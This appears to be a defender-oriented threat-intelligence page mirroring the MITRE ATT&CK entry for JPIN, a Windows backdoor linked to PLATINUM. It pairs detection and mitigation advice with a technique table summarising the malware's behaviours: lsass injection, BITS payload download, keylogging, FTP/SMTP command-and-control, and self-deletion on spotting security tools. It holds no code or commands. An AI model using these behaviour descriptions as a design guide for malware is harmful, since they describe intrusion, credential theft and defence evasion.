S0201: JPIN
Analyst context for executives and security teams
JPIN matters because ATT&CK describes it as a custom Windows backdoor associated with PLATINUM, with relationships spanning discovery, command execution, command-and-control over file and mail protocols, obfuscation, process injection, keylogging, BITS abuse, file deletion, permission changes, and security-tool discovery or impairment. For leaders, the decision value is not just the malware name; it is whether Windows endpoint, network, and identity telemetry can prove what a backdoor learned, what it executed, what it transferred, and whether defenses were weakened.
Executive priority
Prioritize JPIN as a validation case for Windows endpoint resilience and incident readiness. The linked behaviors touch credential risk, security tooling trust, egress control, and evidence preservation. Executives should ask whether the organization can detect suspicious discovery and command execution, investigate possible credential capture, control file/mail protocol egress, and produce audit-ready evidence showing that endpoint controls and logs remain intact during a suspected backdoor intrusion.
Technical view
SOC and IR teams should map coverage around the related ATT&CK techniques rather than relying on a JPIN-specific signature, because ATT&CK provides no official detection text. Validate telemetry for Windows command shell activity, registry queries, service/process/user/group/system/file discovery, BITS job creation or modification, process injection indicators, file deletion, Windows permission changes, ingress tool transfer, and command-and-control over file transfer or mail protocols. Treat the PLATINUM relationship as historical ATT&CK context, not as proof of current activity in a local environment.
Likely telemetry
- Windows endpoint process creation and command-line logs, especially cmd.exe and administrative discovery utilities
- Registry query activity and registry access telemetry
- Service, process, user, local group, system information, and file/directory enumeration events
- BITS job creation, modification, transfer, and execution-related events
- Endpoint memory, handle, module, or behavioral telemetry relevant to process injection
Detection direction
- Build behavior-based detections around unusual clustering of discovery actions on Windows hosts, especially when followed by command shell use, file transfer, BITS activity, or file deletion.
- Tune detections for dual-use administrative commands carefully; false positives are likely where help desk, software deployment, or inventory tooling performs similar discovery.
- Validate visibility into BITS because it is a documented related technique and can blend with legitimate background transfer activity.
- Review egress monitoring for file transfer and mail protocols; focus on unusual destinations, uncommon client processes, abnormal timing, or hosts that do not normally send such traffic.
- Correlate security software discovery, tool disabling or modification, process injection, and permission changes as higher-risk combinations because they can indicate attempts to reduce defensive visibility.
Mitigation priorities
- Start with evidence durability: centralize Windows endpoint, security tool, BITS, file, registry, and network logs so local deletion does not erase the investigation trail.
- Harden Windows endpoints with least privilege, controlled administrative tool usage, and monitoring for permission changes to sensitive files and directories.
- Restrict and monitor unnecessary outbound file transfer and mail protocol use from endpoints that do not require it for business operations.
- Protect security tooling from tampering by monitoring service state, configuration changes, update failures, and unexpected termination of defensive processes.
- Review credential-risk controls because keylogging is a related behavior; prioritize privileged users, administrative workstations, and systems handling sensitive access.
Analyst notes and limits
ATT&CK identifies JPIN as a custom-built backdoor family used by PLATINUM and notes a possible code-base relationship with Dipsind. The object is Windows-platform malware, while several related techniques have broader platform listings; this take applies the relationships to JPIN conservatively in a Windows defense context.
Official detection guidance is not provided, and the malware object has no specified tactics. This summary is derived from the supplied ATT&CK description, external references, and relationships only. Local prevalence, exploitation status, customer exposure, and detection coverage require environment-specific evidence.
JPIN
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1685 | Disable or Modify Tools | JPIN can lower security settings by changing Registry keys.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1222.001 | Windows Permissions Sub-technique | JPIN can use the command-line utility cacls.exe to change file permissions.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | JPIN can use the command-line utility cacls.exe to change file permissions.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1069.001 | Local Groups Sub-technique | JPIN can obtain the permissions of the victim user.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1016 | System Network Configuration Discovery | JPIN can obtain network information, including DNS, IP, and proxies.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1057 | Process Discovery | JPIN can list running processes.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1070.004 | File Deletion Sub-technique | JPIN's installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1012 | Query Registry | JPIN can enumerate Registry keys.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1197 | BITS Jobs | A JPIN variant downloads the backdoor payload via the BITS service.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1071.003 | Mail Protocols Sub-technique | JPIN can send email over SMTP.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1083 | File and Directory Discovery | JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1055 | Process Injection | JPIN can inject content into lsass.exe to load a module.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1105 | Ingress Tool Transfer | JPIN can download files and upgrade itself.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1056.001 | Keylogging Sub-technique | JPIN contains a custom keylogger.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1033 | System Owner/User Discovery | JPIN can obtain the victim user name.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1071.002 | File Transfer Protocols Sub-technique | JPIN can communicate over FTP.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1082 | System Information Discovery | JPIN can obtain system information such as OS version and disk space.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1027 | Obfuscated Files or Information | A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.CitationMicrosoft PLATINUM April 2016 |
| Enterprise | T1007 | System Service Discovery | JPIN can list running services.CitationMicrosoft PLATINUM April 2016 |
Groups, software, and campaigns
G0068: PLATINUM
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | 6b6faed376a3… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Microsoft PLATINUM April 2016
Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
Open source URL -
[2]
JPIN
(Citation: Microsoft PLATINUM April 2016)
-
[3]
mitre-attack S0201Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.